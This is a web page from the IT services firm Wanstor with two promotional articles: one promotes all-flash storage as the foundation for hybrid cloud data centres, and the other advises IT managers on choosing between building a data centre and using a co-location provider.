At Wanstor, we believe that today and tomorrow’s data centres must support new models for resource pooling, self-service delivery, metering, elastic scalability and automatic chargebacks. They must deliver performance and agility that the business needs. No longer is it good enough to blame legacy IT equipment for standing in the way of business progress. IT departments must make sure they reduce complexity by leveraging technologies and architectures that are simple to deploy and manage. They must achieve levels of automation, orchestration and scalability that are not possible within data centres that operate on their own.

At Wanstor we have been thinking about the future of the data centre. We believe many IT departments are missing the fundamental question when seeking answers to their existing infrastructure plans and that is:

How does the data storage strategy integrate within existing and future company owned IT infrastructure and public cloud infrastructures?

At Wanstor we believe the answer to the “storage strategy” question can be found in a storage strategy that encompasses all flash and no longer relies on cumbersome disks and tapes. All-flash storage is the single most important change an IT Manager will need to make to successfully build their future hybrid infrastructure model. Without a flexible and scalable all-flash storage architecture the future data centre and hybrid cloud model actually fails. The performance, cost efficiencies, simplicity, agility and scalability the modern IT department will need to successfully serve their business cannot be achieved without all-flash storage as the infrastructure foundation.

So how do IT Managers leverage the benefits of all-flash storage to build a service-centric data storage infrastructure required for their business? What are some of the innovations in pricing models and all-flash storage architectures that will help them create a cost-efficient, scalable, resilient and reliable hybrid IT infrastructure?

The first thing IT Managers need to recognise is that moving to all-flash storage for a truly hybrid IT infrastructure is not just simply taking an extra step and buying some more kit nor is it rip everything out and start all over again. Instead it is an iterative process that will take place over a period of time depending on how mature a business’s IT infrastructure model is at the moment and what needs to be delivered by IT for business success in the future.

Migrating applications onto all flash storage

If you are an IT decision maker, you realise that your business has probably spent a quite a bit of budget and a significant amount of effort to make sure business critical applications are supported by an underlying IT infrastructure that is reliable, robust and resilient. Indeed you are probably beginning to experience performance challenges with a range of applications, particularly those that require high levels of IOPS. But applications and workloads that might see incremental improvements through faster, more responsive storage are unlikely to be the first place where IT will deploy all-flash systems. Instead, the IT Manager is likely to have specific applications and workloads where the performance challenges of spinning disk storage are difficult to overcome and the underlying storage infrastructure needs to be modernised instead to avoid putting the business at risk. Typical applications and workloads at this stage include databases supporting online transaction processing solutions for e-commerce, infrastructures supporting DevOps teams, and applications that are specific to a particular industry, which require levels of performance that traditional disk storage simply cannot deliver.

To understand which applications should be moved to all-flash storage first, it is important to do three things:

Understand the businesses own requirements for data storage, applications and budget considerations, and identify those workloads that are causing the most pain or providing the best opportunity to use all-flash storage to drive measurable business improvements.

Evaluate the benefits of all-flash storage solutions and how they can be applied to enhance and strengthen particular applications and workloads.

Compare leading all-flash solutions and determine which features, functions and pricing models will maximize the IT department’s ability to modernise workloads and begin a journey to an IT infrastructure model based around flash storage.

When evaluating the benefits of all flash storage, Wanstor believes IT Managers should consider the following critical factors:

Performance – All-flash storage will deliver performance that is at least 10 times greater than that of traditional disks. When thinking about performance, do not focus solely on IOPS; it is also about consistent performance at low latency. Make sure an all flash architecture is deployed that delivers consistent performance across all workloads and I/O sizes, particularly if starting with multiple workloads.

Total Cost of Ownership – The price of flash storage has come down dramatically in the past 12 months. If the IT and finance teams looked at flash several years ago and were scared off by the price, it is time to explore flash storage again. In fact some all flash storage providers have prices as low as £1k per TB of data.

Smaller storage footprint – This will happen through inline de-duplication and compression, along with thin provisioning, space-efficient snapshots and clones. In some cases the storage footprint can be reduced by a ratio of 5:1, depending upon the application and workload.

Lower operational overheads – Through faster more simple deployments, provisioning and scaling and cost savings as less manual maintenance is required.

Availability and resiliency – All-flash arrays utilise a stateless controller architecture that separates the I/O processing plane from the persistent data storage plane. This architecture provides high availability (greater than 99.999%) and non-disruptive operations. The IT Manager can update hardware and software and expand capacity without reconfiguring applications, hosts or I/O networks, without disrupting applications or sacrificing performance of the hardware.

Simpler IT operations – Many all-flash arrays are now plug and play, so simple that they can be installed in less than hour in many cases. Additionally storage administrators do not have to worry about configuration tuning and tweaking, saving hours or days of effort and associated expenses.

Consolidation – The next stage of moving more applications to flash storage

Once you have put your first applications on an all-flash storage array, the improvements in performance should be enough for the IT and finance teams to decide to invest further in the technology and really accelerate their journey to a flash storage based IT infrastructure.

Most IT leaders, will want to expand the benefits they will have seen from the initial deployment of flash storage to additional applications and workloads across the data centre. As the all-flash storage solution expands to additional applications, IT Managers will find that TCO benefits increase substantially. Because all-flash storage supports mixed workloads, IT Managers will be able to consolidate more applications on fewer devices, thus reducing IT infrastructure capital expenditure. By consolidating, IT Managers will also be able to maximize many of the cost savings mentioned earlier in this article (lower energy consumption, less floor space use, reduced software licensing fees etc).

In dense mixed workload applications, the TCO of using a flash storage solution will typically be 50% to 70% lower than a comparably configured traditional disk solution. Beyond the specific cost savings, the performance gains across more applications will drive significant business improvements and new opportunities. Resulting in a more agile IT infrastructure.

Additionally, the right all-flash storage architecture will help future-proof storage infrastructure, so that the investments being made today will continue to provide value as all flash storage usage is expanded across the business.

Building a business ready cloud on all flash storage

What do IT departments want and need from their cloud infrastructures? How can they leverage the cost savings and agility of the public cloud model, and link it to the control, security, data protection and peace of mind which can be achieved with an on-premises cloud infrastructure?

From Wanstor’s recent experiences many IT Managers want it all when it comes to cloud computing. They want to be able to provide all the features, functions and flexibility available from the leading public cloud service providers within their own IT infrastructure constraints. For many IT departments deploying cloud models similar to the big 3 cloud providers in a private cloud environment is simply unrealistic as the big 3 public cloud operators have lots of cash, resources and availability in terms of their infrastructure platforms.

If the IT department is unable to provide a better alternative to a public cloud solution, it is highly likely users within a business will feel the need to go to the public cloud. This creates a fertile ground for shadow IT initiatives that can cause security problems and other risks.

Beyond delivering public cloud-like features and functionality for an IT infrastructure solution, the IT department may also want to improve in areas where the public cloud may fall short. Performance is an example of this – If you want to use cloud services to support high-performance computing or big data analytics or some of the other important next-generation IT initiatives, it is likely the IT team will have to pay a premium to a public cloud service provider to match the businesses requirements.

Security is another critical area where building your own cloud infrastructure will give the IT department much greater control and peace of mind, particularly as they begin thinking about supporting the most important business applications and data in the cloud. As the IT department moves from the first all-flash applications through consolidation and toward the all flash cloud, an important step will be to bridge the virtualization gap between servers and the rest of the IT infrastructure, namely storage and networking.

To deliver a basic cloud-type service based on a flash storage platform, IT’s list of wants must include:

Shared resources through automated processes – Users should be able to go straight to an on-premises cloud and choose the storage capacity and performance they need, for as long as they need it.

Automated metering and charging – Once users have chosen the resources they want, the cloud infrastructure should be able to meter their usage and create an automated chargeback mechanism so they pay for what they actually used.

Scalability – Once resources are used, they go back into the pool and become available to other users and departments. As storage capacity and performance requirements grow, the storage platform should be simple to upgrade, update and scale. With virtualization across servers, storage and networking, an all-flash storage array becomes the foundation for a cloud infrastructure.

In this article we have discussed all-flash storage and the foundation it provides for a truly hybrid IT infrastructure to take place. Without the benefits of all-flash storage businesses will not be able to modernise their infrastructures to deliver cloud services. It is no coincidence that the largest cloud providers rely on all-flash storage solutions as their storage foundation. As discussed you can take the journey in stages, starting small with a single application or two, and then adding more applications through consolidation and virtualization. You can also implement multiple stages at once. Or you can do everything at once with all-flash storage solutions.

At Wanstor we believe the time for flash storage is now. The technology is great and at a price point where most businesses will see a return on their storage investments within 12 months due to the improved performance they receive across their business operations.

For more information about flash storage and how Wanstor can help your business with its IT infrastructure strategy and storage platforms, please visit https://www.wanstor.com/data-centre-storage-business.htm

Read More

Is your data centre under capacity and cost pressures? A co-location strategy may provide the answer

25th January 2018
|

Is your private cloud strategy really working? What is your framework for success?

For many businesses, the data centre is critical to a successful day-to-day operation. But data centres are under pressure with not only the volume of data they have to store and process for a business but also rising power costs, new environmental responsibilities which need to be adhered to, data centre technologies evolving rapidly, and escalating costs of security, cooling, connectivity, management and maintenance. This means for many businesses when they reach a certain capacity in their data centre the IT department can no longer simply ask finance for the funds to build another one. Instead they need to explore other options and usually it comes down to a choice of two things – retrofit the existing data centre or switch to a co-location provider.
At Wanstor we understand for many businesses there are a number of ‘non-negotiables’ when it comes to the performance of their data centres.

Maintaining stable, secure power – Evolving technologies and changing service requirements affect power and cooling demands. Today’s data centre energy costs are substantial. At Wanstor we have seen some customers spending upwards of 70% of their operational costs just to keep an existing data centre operation running smoothly. Finding a way to control those costs is often a significant driver for businesses to move to hosted data centre solutions.

Redundancy and reliability – Most data centres have backup options for power in case of outages (UPS and a diesel generator). Many businesses spend a lot of time having to upgrade these assets each year to make sure they are in line with their data centres’ changing power requirements.

Keeping data safe – At Wanstor we believe data can be used in a variety of ways to transform a business, but how it is stored, managed and maintained means there is another side to it – RISK. Privacy has to be protected. Confidential information must be safeguarded. Industry compliancy requirements, UK and EU regulations must be met. IT Managers need to know if their company’s data is stored on UK soil. Additionally the constant stream of new developments in IT and physical security due to the continued evolution of IT security threats means that many IT Managers are not confident their own data centres and systems are as secure as possible.

Growth vs Cost – Expand too quickly or too much and the IT Manager risks wasting resources. Limit growth and the IT Manager risks inhibiting a business’s potential. Building a brand-new data centre will give the IT Manager the flexibility to customise a build for their business. However the offset of all the advantages of a newly built data centre are usually wiped out by the finance team when they see the high costs of construction involved, the difficulties in selecting the right build partner and lack of appropriate locations. Indeed as so much is expected of modern day data centres only large enterprises appear to be building them in today’s market. This is backed by Forrester Research which estimates co-location is 37% less expensive than building your own data centre, based on costs over a 15-year period. This means for many small and medium sized companies, the only real solution available to them when they run out of data centre space is to outsource to a co-location provider.

Is hosting the right choice for your business?

For many small and medium sized businesses, moving to a hosted data centre model can be an effective way of offsetting the challenges associated with operating and maintaining their own data centre. At Wanstor we believe IT Managers should examine the types of questions below before deciding whether or not a hosting solution is the right choice for their business. The questions below should help an IT Manager gain a relatively quick view on insource vs outsource regarding their data centres after having answered these questions:

What are you looking to achieve with your data centre operations?

  • Address increasing power and cooling requirements?
  • Maximise uptime, availability and redundancy?
  • Keep technology up to date in an ever changing world?
  • Strengthen physical and data security?
  • Increase capacity whilst reducing power costs?
  • Investigate ways to optimise operational performance across systems and people?
  • Make sure IT teams are focussed on core business offerings?
  • Improve the efficiency and effectiveness of IT resource management and support?
  • Create a predictable cost model?
  • Reduce operational complexity and risk?

By defining what IT and the business wants to achieve with a new data centre, IT Managers can then scope the solution their business needs. Quite often when financial metrics are applied to outcomes IT Managers will conclude that outsourcing to a co-location provider is usually a third cheaper than building a new data centre themselves. This means in the majority of cases the decision will be made to outsource to a co-location provider.

Once the decision to outsource data centre operations to a co-location provider has been made, it is important for the IT Manager to take the time to understand the key characteristics of a dependable co-location data centre. At Wanstor we believe when evaluating a provider’s facilities, IT Managers need to take a close look at the data centre’s capabilities, strengths and potential weaknesses.

From our extensive experience at Wanstor we believe important questions to ask a potential co-location provider include:

What tier ranking is the facility designed to meet? Does your business really need a Tier 4 facility (which you pay a significant amount more for) or will a Tier 3 data centre suffice?

What is your downtime tolerance level and can the facility meet your businesses uptime needs? Remember downtime can affect your business – in terms of revenue, customer experience and brand image.

What security measures are in place? As hosted data centres share multiple customers, advanced security features should be in place including 24/7 x 365 on-site security, network security (intrusion detection, virtualized firewalls and load balancers), and the ability to monitor lines for traffic. At Wanstor we always recommend that IT Managers take the time to discover how much control a provider has over the network that will be delivering hosted data centre services. Additionally it would be wise to ask about managed protection against DDoS attacks, event management and any other security services essential to your business.

Scalability – What are the options? As a business grows, it will need more data centre space and scalable capacity. Additionally any hosted data centre facility that is chosen should be able to adopt new technologies quickly. Cloud services and fully-managed virtualized environments offer many businesses an opportunity to enhance scalability and refocus key IT resources on revenue generating activities. You may not need these services today, but having your data hosted is usually a long-term decision because moving is expensive and risky. So IT Managers need to think beyond the initial contract term and make sure they have room to grow, and some allowance to meet future needs.

Auditing – When transferring data and applications to a data centre, the IT department are also transferring compliance responsibilities. Therefore the IT Manager should check that their data centre provider has the relevant compliance certifications and ask for proof of them.

Power consumption model – Service reliability will depend on a co-location provider’s ability to measure, monitor and allocate power usage. In an over-subscription power allocation model, a single reading is used for the entire data centre. Unused power from one customer can be resold to another and spikes in power demand from other customers can drain your resources. In the power reservation model, you get the total capacity you’ve paid for, whether or not you use it. You’ll always have enough energy to run your systems, and close monitoring ensures the provider can quickly detect and respond to any increases in your demand. This prevents the situation where one customer has the ability to affect another customer’s environment.

What environmental initiatives are included? Integrated sustainable energy technology is good both for operational cost savings and the environment. Time should be taken to consider the co-location providers environmental track record, look for advancements such as virtualized environments, use of free cooling solutions and heat exchangers. All of these can be reliable, cost-effective alternatives to traditional technologies. Many service providers today aspire to improve their power usage effectiveness (PUE), an industry measure of energy efficiency. A service provider with good PUE will also help keep power costs down.

Connectivity – The network linking a provider’s data centres is a critical component of their offering. Data centres typically process large volumes of traffic, and the network that connects the data centres, to each other and to the business needs to sustain volumes reliably and securely at all times. The physical location of data centres is also important, as providers often space out their facilities to minimise the risk of a mass disruption. But many data centre applications are sensitive to latency. The further your data needs to travel, the more likely it is that delay may become an issue. Therefore evaluating the connectivity performance and options from a data co-location provider is crucial.

Beyond the characteristics of the data centre itself, the IT Manager will also want to be confident in a provider’s ability to meet business needs. Other questions the IT Manager should be asking alongside exploring the key areas above include:

What kind of network does the provider operate? How does the network cope with spikes in demand? What are the latency levels for different applications?

What kind of service-level agreements (SLAs) are offered? Are the hosting and connectivity service levels aligned and through the same provider. If they’re not aligned this could spell trouble as one service may operate better than the other leaving a range of performance issues.

Are professional services available to help with understanding technology options/upgrades? One size does not fit all. The right data centre provider will assess your needs, current capabilities and future plans, and will work with you to find a solution that meets your unique business goals.

Can services be scaled quickly and easily? IT needs will continue to evolve that is for certain and not always in ways the IT Manager can predict. Look for power and capacity that can be scaled quickly, giving you the energy, space and bandwidth you need to grow your business.

Does the provider offer virtual hosting and cloud solutions? Dedicating a server to each application and configuring it to handle peak loads can be inefficient. Moving your applications to a virtual server farm can help keep costs low and give you the advantage of architectural flexibility. Virtual solutions also scale up quickly and easily, without requiring the IT Manager to invest in any hardware. Look for a provider equipped with the latest virtual service offerings, such as Infrastructure as a Service (IaaS), which gives IT complete control over capacity and charges only for the services used.

Does the provider invest continually in infrastructure and cloud capabilities? One of the benefits of moving to a hosted data centre model is taking advantage of new technology. A good provider will constantly invest in upgrades and advances e.g. by integrating cloud capabilities or adopting the latest innovations in physical and data security.

Are costs predictable? Working with a data centre provider will give you access to a sophisticated infrastructure without incurring significant capital costs. Make sure the monthly costs associated with the hosted service are stable and predictable, challenge anything out of the norm such as unforeseen maintenance requirements for example.

This article should help IT Managers think about co-location data centre solutions when they are reaching the limits of their own data centre infrastructure. For more information about Wanstor data centre co-location services download our brochure here.

Read More
Wanstor
124-126 Borough High Street London, SE1 1LB
Phone: 0333 123 0360, 020 7592 7860
IT Support London from Wanstor IT Support London